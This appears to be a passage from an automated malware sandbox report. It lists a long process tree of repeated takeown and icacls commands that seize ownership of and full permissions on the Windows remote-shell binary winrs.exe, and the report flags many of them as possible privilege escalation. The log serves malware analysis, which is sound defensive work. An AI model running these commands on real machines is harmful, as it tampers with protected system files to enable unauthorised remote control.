C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:3976
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4704
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:1396
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3064
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:2376
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:3400
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:4424
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4580
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3548
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3880
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:3148
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4780
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:4588
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:1336
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:1864
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3000
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
PID:1188
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:1652 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4072
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Modifies file permissions
PID:4380
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1664
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:3840
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:868
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
PID:4592 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1920
-
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2708
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
PID:752
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:4852
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:4284
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:1408
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Modifies file permissions
PID:2380
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1248
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:1984
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4804
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
PID:3020
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5100
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:1388
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4848
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
PID:1588
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4104
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:640
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2952
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:4844
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3712
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:2700
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:100
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2208
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5056
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:208
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1180
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2528
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5036
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
PID:4272
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:5020
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
PID:1516
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4216
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:2316
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4048
-
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:312
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:3744
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4432
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
PID:3488
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3892
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:4684
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4088
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:408
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3608
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:456
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4548
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
PID:4020
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4148
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Modifies file permissions
PID:4864
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1716
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4284
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:5072
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1712
-
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4176
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2684
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
PID:4424
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:3064 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4848
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
PID:1396 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1588
-
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4552
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:944
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
PID:1552 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2536
-
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:868
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Modifies file permissions
PID:1316
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1148
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:1432
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:1560
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:1420
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2700
-
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2732
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:3952
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:100
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Modifies file permissions
PID:1772
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4144
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4332
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5036
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:3680
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:4756 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4768
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Modifies file permissions
PID:3704
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5068
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1176 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4272
-
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:2244
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3104
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5088
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:872
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2396
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:4956
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1476 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3432
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Modifies file permissions
PID:2220
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4872
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
PID:3028
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2756
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Modifies file permissions
PID:2344 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2264
-
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3956
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4804
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Modifies file permissions
PID:1548 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2112
-
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3440
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4104
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:4580
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1780
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:5000
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1956
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2952
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:4748
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1120
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:640
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:884
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:4380
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1680
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:2440
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5020
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
PID:1244 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1188
-
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:612
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Modifies file permissions
PID:2372
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1336
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3000
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
PID:4852
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:212
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:976
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3544
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
PID:1032
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:532
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:3920
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3752
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:2540
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5108
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:2380
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1784
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:5104
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3392
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵PID:752
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3840
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Modifies file permissions
PID:1292 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1664
-
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2192 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3400
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4816
-
-
